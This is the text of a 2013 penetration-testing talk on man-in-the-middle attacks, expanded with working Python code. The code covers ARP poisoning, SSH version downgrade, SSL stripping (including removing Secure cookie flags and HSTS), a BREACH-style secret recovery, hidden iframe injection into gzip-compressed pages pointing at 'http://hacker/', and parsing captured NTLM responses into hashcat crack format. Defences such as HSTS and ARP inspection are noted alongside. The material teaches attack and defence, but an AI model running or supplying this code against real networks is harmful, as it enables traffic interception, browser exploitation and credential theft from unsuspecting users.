Offensive Man-in-the-Middle
Navaja Negra - Albacete
October 2013
$ whois jselvi
Jose Selvi
10 years working in Security
Senior Penetration Tester at S21sec
SANS Institute Community Instructor
GIAC Security Expert (GSE)
Twitter: @JoseSelvi
Blog: http://www.pentester.es
Disclaimer!
No user was (very) harmed in the making of this speech
Let's Go!
Man-in-the-Middle 101
The Passive approach
Downgrade Attacks
SSL Bypass
On-the-fly content injection
Cheating up users
Browser exploitation
Man-in-the-Middle
ARP Spoofing
Victim: WHO'S THE ROUTER?
Attacker: I'M THE ROUTER!
DHCP Spoofing
Victim: I WANT AN IP
Attacker: YOUR IP IS...
ICMP Redirect
Attacker: A NEW ROUTE FOR YOU
Much more...
DNS Spoofing
Port Stealing
STP Mangling
Route Mangling
...
Even Social Engineering...
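The ARP Spoofing slide above in code. This is an added example, not code from the talk: it builds the "I'M THE ROUTER!" frame by hand (Ethernet II + ARP reply claiming the gateway's IP for the attacker's MAC, no scapy needed) and shows the defender's side, an arpwatch-style table that flags the moment the gateway's MAC changes. All MAC and IP addresses are constructed for the example; send_frame() is how the frame would go on the wire on Linux but is never called here.

```python
import socket
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed addresses for this example (hypothetical LAN).
ATTACKER_MAC = bytes.fromhex("0a1b2c3d4e5f")
VICTIM_MAC = bytes.fromhex("00aa00bb00cc")
GATEWAY_MAC = bytes.fromhex("0011223344dd")
VICTIM_IP = bytes([192, 168, 1, 10])
GATEWAY_IP = bytes([192, 168, 1, 1])


def mac_str(mac):
    return ":".join(f"{b:02x}" for b in mac)


def ip_str(ip):
    return ".".join(str(b) for b in ip)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac):
    """Build a raw Ethernet II + ARP frame (hardware type 1 = Ethernet, protocol 0x0800 = IPv4)."""
    eth = dst_mac + sender_mac + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + sender_mac + sender_ip + target_mac + target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of a frame as a dict, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sender_mac": frame[22:28], "sender_ip": frame[28:32],
            "target_mac": frame[32:38], "target_ip": frame[38:42]}


def poison_frame():
    """'I'M THE ROUTER!': an unsolicited reply to the victim binding the gateway IP to the attacker's MAC.
    The same has to be done towards the gateway (victim IP -> attacker MAC) and IP forwarding enabled,
    otherwise the victim simply loses connectivity instead of being proxied."""
    return build_arp(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP, dst_mac=VICTIM_MAC)


def send_frame(iface, frame):
    """Transmit a raw frame (Linux AF_PACKET, needs CAP_NET_RAW). Not called in this example."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    s.bind((iface, 0))
    s.send(frame)
    s.close()


class ArpWatch:
    """Detection side: remember the MAC first seen (or statically configured) for each IP, flag changes."""

    def __init__(self, known=None):
        self.table = dict(known or {})

    def observe(self, frame):
        """Return an alert string if a reply contradicts the known IP-to-MAC binding, else None."""
        arp = parse_arp(frame)
        if arp is None or arp["op"] != ARP_REPLY:
            return None
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known != mac:
            return f"ARP conflict for {ip_str(ip)}: {mac_str(known)} -> {mac_str(mac)}"
        return None
```

The poisoning has to be repeated every few seconds because the victim's cache entry expires and a legitimate reply from the real gateway would restore it; that repetition is exactly what makes it noisy and easy to spot with the watch table above, with Dynamic ARP Inspection on the switch, or with static ARP entries for the gateway.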
The Passive approach
Just Sniffing...
Automated Analysis
Password Capture
Downgrade Attacks
Protocol Negotiation (diagram)
Downgrade Attack
(meme caption) And the woman says "a relaxing cup of cafe con leche"... Hush, hush... I have lent them money...
The SSHv1 Example
Client -> Attacker: I can speak v1 & v2
Attacker -> Server: I can speak just v1
Server: OK, let's talk SSHv1
Result: SSHv1
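The SSHv1 exchange above as a runnable negotiation, added here as an example rather than taken from the talk. In the real protocol the capability claim travels in the server's identification string (RFC 4253 section 5.1: "SSH-1.99-..." means the server speaks both 1.x and 2.0), so the attacker's filter rewrites that string to "SSH-1.5-..." ("I can speak just v1") and a client willing to fall back picks v1. The software version strings and the client policies are assumptions for the example.

```python
import re

BANNER_RE = re.compile(r"^SSH-(\d+\.\d+)-(\S+)")


def server_banner(supports_v1, supports_v2, software="OpenSSH_5.9"):
    """Identification string the server sends first. protoversion 1.99 means 'I speak both 1.x and 2.0',
    2.0 means v2 only and 1.5 means v1 only (RFC 4253 section 5.1)."""
    if supports_v1 and supports_v2:
        proto = "1.99"
    elif supports_v2:
        proto = "2.0"
    elif supports_v1:
        proto = "1.5"
    else:
        raise ValueError("server must support at least one protocol version")
    return f"SSH-{proto}-{software}\r\n"


def server_versions(banner):
    """Set of major versions a banner offers."""
    m = BANNER_RE.match(banner)
    if not m:
        raise ValueError("not an SSH identification string")
    proto = m.group(1)
    return {1, 2} if proto == "1.99" else ({2} if proto == "2.0" else {1})


def mitm_filter(banner):
    """The attacker's in-line rewrite: a server offering both versions is shown to the client as v1-only.
    This is the filter logic behind the classic sshmitm / ettercap SSH downgrade."""
    return re.sub(r"^SSH-1\.99-", "SSH-1.5-", banner)


def client_choose(banner, client_versions):
    """The client takes the highest version both sides speak, or refuses (None) if there is none.
    client_versions={2} models OpenSSH's 'Protocol 2' setting, which defeats the downgrade."""
    common = client_versions & server_versions(banner)
    return max(common) if common else None


def negotiate(client_versions, server_v1=True, server_v2=True, mitm=False):
    """Run the exchange and return the protocol version actually used (None = no connection)."""
    banner = server_banner(server_v1, server_v2)
    if mitm:
        banner = mitm_filter(banner)
    return client_choose(banner, client_versions)
```

The two outcomes that matter: a client that allows v1 as a fallback ends up on SSHv1 (whose host-key exchange the attacker can then proxy), while a client pinned to v2 simply fails to connect, which is the right behaviour under attack. Logging the server banner seen by the client and comparing it against the banner the server is known to emit is a cheap way to notice the rewrite.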
SSL Bypass
Self-Signed Certificate
Client <-HTTPS-> Attacker <-HTTPS-> Server
SSL Strip
http://www.thoughtcrime.org/software/sslstrip/
By Moxie Marlinspike
Transparent proxy
HTTP to HTTPS gateway
sed 's/https/http/g'
It usually all starts with a plain HTTP connection
SSL Strip
Client <-HTTP-> Attacker <-HTTPS-> Server
Client -> Attacker: GET / HTTP/1.1
Server -> Attacker: <body><img src=whatever.jpg><a href=https://myweb/login></body>
Attacker -> Client: <body><img src=whatever.jpg><a href=http://myweb/login></body>
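The "sed 's/https/http/g'" from the SSL Strip slides, written out as the rewriting half of such a proxy. This is an added example, not sslstrip's own code: it rewrites https:// links in bodies and Location headers, remembers which hosts were stripped so the proxy knows to speak HTTPS upstream for them, strips the Secure attribute from cookies (otherwise the browser would not send them over the stripped HTTP session) and drops Strict-Transport-Security. Header handling beyond those three is an assumption of the example.

```python
import re

HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.\-]+(?::\d+)?)")


class StripState:
    """Hosts whose links have been rewritten; the proxy must talk HTTPS to these upstream."""

    def __init__(self):
        self.stripped = set()

    def upstream_scheme(self, host):
        """The client asked for http://host; pick the scheme the proxy uses towards the real server."""
        return "https" if host in self.stripped else "http"


def strip_body(body, state):
    """The sed of the slide applied to an HTML body, remembering every host it touched."""
    def repl(m):
        state.stripped.add(m.group(1))
        return b"http://" + m.group(1)
    return HTTPS_URL.sub(repl, body)


def strip_headers(headers, state):
    """Same treatment for response headers, given as a list of (name, value) bytes pairs:
    a redirect to https:// becomes http://, Set-Cookie loses its Secure attribute,
    and Strict-Transport-Security is removed so the browser never learns to insist on HTTPS."""
    out = []
    for name, value in headers:
        lname = name.lower()
        if lname == b"location":
            value = strip_body(value, state)
        elif lname == b"set-cookie":
            value = re.sub(rb";\s*secure(?=;|$)", b"", value, flags=re.IGNORECASE)
        elif lname == b"strict-transport-security":
            continue
        out.append((name, value))
    return out
```

The whole trick depends on the first request being plain HTTP, which is why the counter-measure is on the client: a browser that already holds an HSTS entry for the site (or has it in the preload list) will upgrade to HTTPS itself before the attacker ever sees a request to rewrite.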
DEMO
SSL Vulnerabilities
BEAST / CRIME
By Juliano Rizzo, Thai Duong
BREACH
By Angel Prado, Neal Harris, Yoel Gluck
CRIME and BREACH are based on compression characteristics before encryption (CRIME: TLS-level compression, BREACH: HTTP-level compression of the response body); BEAST instead abuses the predictable CBC IVs of TLS 1.0.
Chosen plaintext attacks
They can decrypt secrets (cookie, csrf-token, etc).
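How "compression before encryption" leaks a secret, as an added example that is not from the talk or from the BREACH authors' tooling. A constructed page carries a CSRF token and reflects attacker-chosen text; the attacker only sees the compressed size. The guess that correctly extends the prefix of the token is absorbed into the LZ77 back-reference and costs one token less, so the secret falls out byte by byte. The compressor here is a greedy LZ77 token counter standing in for DEFLATE's first stage (an assumption that makes the size difference exact); against real zlib the Huffman stage rounds sizes to whole bytes, which is why the real BREACH attack uses its "two tries" trick and repeated measurements rather than the single comparison shown here.

```python
SECRET = b"7f3a9c1e"  # constructed CSRF token the attacker wants to read


def page(reflected):
    """Constructed response: a secret in a hidden form field plus attacker-controlled text reflected later."""
    return (b"<html><form><input type=hidden name=csrftoken value=" + SECRET
            + b"></form><p>You searched for: " + reflected + b"</p></html>")


def lz77_tokens(data, min_match=3):
    """Number of tokens a greedy LZ77 pass (DEFLATE's first stage, before Huffman coding) emits:
    every literal byte is one token, every back-reference to an earlier repeat of >= min_match bytes
    is one token. A simplified model of zlib so the size difference below is exact."""
    i, n, tokens = 0, len(data), 0
    while i < n:
        best = 0
        for j in range(i):
            k = 0
            while i + k < n and data[j + k] == data[i + k]:
                k += 1
            best = max(best, k)
        i += best if best >= min_match else 1
        tokens += 1
    return tokens


def oracle(reflected):
    """What the network attacker observes: the compressed size of the response to a request he chose."""
    return lz77_tokens(page(reflected))


def recover(size_oracle, prefix=b"csrftoken value=", alphabet=b"0123456789abcdef", max_len=64):
    """Byte-at-a-time recovery: the guess that extends the match against the secret compresses better.
    prefix is the known text immediately before the secret; alphabet is the secret's character set."""
    known = b""
    while len(known) < max_len:
        sizes = {c: size_oracle(prefix + known + bytes([c])) for c in alphabet}
        best = min(sizes, key=sizes.get)
        if sizes[best] == max(sizes.values()):
            break  # every guess costs the same: the secret has ended
        known += bytes([best])
    return known
```

The three preconditions are visible in the code: the secret and the attacker-controlled input must land in the same compressed stream, the response size must be observable (any man-in-the-middle position gives that), and the attacker must be able to make the victim issue many requests (the injected iframe of the next section). Disabling TLS compression kills CRIME; BREACH needs the application to stop compressing responses that mix secrets with reflected input, or to randomise the secret per request.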
On-the-fly content injection
Spanish model (diagram): Corp.A, Corp.B, Corp.C, Corp.D
The "K" Factor
<body><img src=whatever.jpg></body><iframe src=http://hacker/>
<body><img src=whatever.jpg></body><iframe src=http://hacker/>
The Middler
https://code.google.com/p/middler/
By InGuardians
Transparent HTTP & SIP Proxy
Plugin based: Easy & Powerful
IFrame Injection
Last release from July 2009
Some fixes are needed...
but... that is why Python r00l3z :)
The Middler Plugins
Burp Suite / The Middler
Client <-HTTP-> Attacker <-HTTP-> Server
Client -> Attacker: GET / HTTP/1.1
Attacker -> Client: <body><img src=whatever.jpg></body><iframe src=http://hacker/>
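The iframe injection from the diagram, as an added example rather than a Middler plugin or a Burp match/replace rule. A byte-level search-and-replace on the response stream breaks in practice for three reasons, and this function handles each: the body is often gzip-compressed (so the marker is not visible), Content-Length must be recomputed or the browser truncates the page, and only text/html responses should be touched. The payload and the sample response are constructed for the example; chunked transfer-encoding is left untouched, which a real proxy would de-chunk first.

```python
import gzip

IFRAME = b'<iframe src="http://hacker/" width="0" height="0"></iframe>'  # the slide's payload, hidden


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, [(name, value), ...], body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete HTTP response")
    status, *lines = head.split(b"\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def get_header(headers, name):
    for n, v in headers:
        if n.lower() == name:
            return v
    return b""


def inject_iframe(raw, payload=IFRAME):
    """Insert payload just before </body> of an HTML response, fixing what a naive sed gets wrong:
    gzip-compressed bodies, the Content-Length, and non-HTML content. Returns raw unchanged otherwise."""
    status, headers, body = split_response(raw)
    if not get_header(headers, b"content-type").lower().startswith(b"text/html"):
        return raw
    if b"chunked" in get_header(headers, b"transfer-encoding").lower():
        return raw
    encoding = get_header(headers, b"content-encoding").lower()
    if encoding not in (b"", b"gzip"):
        return raw  # deflate/br etc.: leave alone rather than corrupt the page
    plain = gzip.decompress(body) if encoding == b"gzip" else body
    idx = plain.lower().rfind(b"</body>")
    if idx < 0:
        return raw
    plain = plain[:idx] + payload + plain[idx:]
    body = gzip.compress(plain) if encoding == b"gzip" else plain
    # Re-emit the headers with Content-Length replaced (or added) so the browser reads the whole body.
    new_len = str(len(body)).encode()
    out, seen = [], False
    for name, value in headers:
        if name.lower() == b"content-length":
            value, seen = new_len, True
        out.append(name + b": " + value)
    if not seen:
        out.append(b"Content-Length: " + new_len)
    return status + b"\r\n" + b"\r\n".join(out) + b"\r\n\r\n" + body


def sample_response(gzipped):
    """Constructed server response used for the demonstration."""
    html = b"<html><body><img src=whatever.jpg></body></html>"
    body = gzip.compress(html) if gzipped else html
    lines = [b"HTTP/1.1 200 OK", b"Content-Type: text/html; charset=utf-8",
             b"Content-Length: " + str(len(body)).encode()]
    if gzipped:
        lines.append(b"Content-Encoding: gzip")
    return b"\r\n".join(lines) + b"\r\n\r\n" + body
```

Injecting into every HTML response is the "K factor": each page the victim loads over plain HTTP now also loads http://hacker/, and that single origin is what the next sections point at BeEF and Metasploit.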
Burp Suite
http://portswigger.net/burp/
By PortSwigger
General-purpose interception proxy
Supports transparent proxying (invisible proxy mode)
Supports match/replace rules
Best option if you have the Pro version
If not... you lose your configuration when closing Burp Suite
DEMO
Cheating up users
BeEF & Metasploit
BeEF: Browser Exploitation Framework
http://beefproject.com/
Metasploit Framework
http://www.metasploit.com/
BeEF & MSF
Diagram: the VICTIM browsing GOOGLE through the attacker receives an injected <iframe src=http://attacker/demo> that loads from BeEF / MSF.
What to do
Fingerprinting
Redirect to another page
Capture NTLM
SMB Relay Attacks
Credential Theft
Request software installation
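The "Capture NTLM" item above, worked through as an added example (not BeEF's or Metasploit's own code). The injected iframe points at the attacker's web server, which answers 401 with WWW-Authenticate: NTLM; a browser that treats the host as Intranet zone (Internet Explorer's default) answers with a Type 1 message, gets a Type 2 message carrying the server's 8-byte challenge, and finally sends Authorization: NTLM <base64 Type 3>. What the attacker keeps is that Type 3: this code builds a constructed one, parses it by its offset fields (MS-NLMP 2.2.1.3) and formats user, domain, challenge and response in the hashcat NetNTLMv1/v2 line format. The user, domain, challenge and NTLMv2 response bytes are all made up for the example.

```python
import base64
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_NTLM = 0x00000200
NTLM_TYPE3 = 3

# Constructed values: the challenge our fake web server put in its Type 2 message, and a made-up
# NTLMv2 response (16-byte NTProofStr followed by the client blob) as a victim browser would return.
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
SAMPLE_NTPROOF = bytes(range(16))
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6               # RespType, HiRespType, reserved
               + b"\x00" * 8                            # timestamp (zeroed in this sample)
               + bytes.fromhex("1011121314151617")      # client challenge
               + b"\x00" * 4 + b"\x00" * 4)             # reserved, empty AV_PAIR list (MsvAvEOL)


def _field(data, offset):
    """Len, MaxLen, BufferOffset triple that every variable-length field of the header uses."""
    return struct.pack("<HHI", len(data), len(data), offset)


def build_type3(user, domain, workstation, nt_response, lm_response=b"\x00" * 24,
                flags=NEGOTIATE_UNICODE | NEGOTIATE_NTLM):
    """Build an AUTHENTICATE_MESSAGE with the 64-byte fixed header and no Version/MIC fields."""
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    items = [("domain", domain.encode(enc)), ("user", user.encode(enc)),
             ("workstation", workstation.encode(enc)), ("lm", lm_response),
             ("nt", nt_response), ("key", b"")]
    offset, fields, payload = 64, {}, b""
    for name, data in items:
        fields[name] = _field(data, offset)
        payload += data
        offset += len(data)
    header = (SIGNATURE + struct.pack("<I", NTLM_TYPE3) + fields["lm"] + fields["nt"]
              + fields["domain"] + fields["user"] + fields["workstation"] + fields["key"]
              + struct.pack("<I", flags))
    return header + payload


def parse_type3(msg):
    """Extract user, domain, workstation and both responses from a Type 3 message via its offsets."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != NTLM_TYPE3:
        raise ValueError("not an NTLM AUTHENTICATE message")

    def field(pos):
        length, _, offset = struct.unpack_from("<HHI", msg, pos)
        return msg[offset:offset + length]

    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    return {"lm": field(12), "nt": field(20), "domain": field(28).decode(enc),
            "user": field(36).decode(enc), "workstation": field(44).decode(enc), "flags": flags}


def to_authorization_header(msg):
    """How the browser carries the message: Authorization: NTLM <base64>."""
    return "NTLM " + base64.b64encode(msg).decode()


def from_authorization_header(value):
    """Decode the Authorization header value back into the raw NTLM message."""
    scheme, _, token = value.strip().partition(" ")
    if scheme.upper() != "NTLM":
        raise ValueError("not NTLM authentication")
    return base64.b64decode(token)


def to_hashcat(parsed, server_challenge):
    """Crackable line: -m 5500 for NTLMv1 (24-byte NT response), -m 5600 for NTLMv2."""
    user, domain, lm, nt = parsed["user"], parsed["domain"], parsed["lm"], parsed["nt"]
    if len(nt) == 24:
        return f"{user}::{domain}:{lm.hex()}:{nt.hex()}:{server_challenge.hex()}"
    return f"{user}::{domain}:{server_challenge.hex()}:{nt[:16].hex()}:{nt[16:].hex()}"


SAMPLE_TYPE3 = build_type3("alice", "CORP", "WS01", SAMPLE_NTPROOF + SAMPLE_BLOB)
```

Because the attacker chooses the challenge, the captured NTLMv1 responses can be attacked with precomputed tables, and NTLMv2 ones with a dictionary; the "SMB Relay Attacks" item on the same slide is the alternative of not cracking at all and forwarding the Type 3 to another host while the challenge is still live. Automatic logon to Intranet-zone sites is the client setting that makes the capture silent.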
DEMO
Browser exploitation
Browser Vulnerabilities 2012
Internet Explorer: 34
Mozilla Firefox: 99
Google Chrome: 68
Java Plugin: 32
Adobe Flash: 61
Adobe Reader: 25
Source: http://www.gfi.com/blog/wp-content/uploads/2013/02/Most-Targeted-Applications-in-2012.jpg
Metasploit Exploitation
Diagram: the VICTIM browsing GOOGLE through the attacker receives an injected <iframe src=http://attacker/demo> that loads the MSF browser exploit.
DEMO
Jose Selvi
http://twitter.com/JoseSelvi
[email protected]
http://www.pentester.es
[email protected]
http://www.s21sec.com
Thanks! Questions?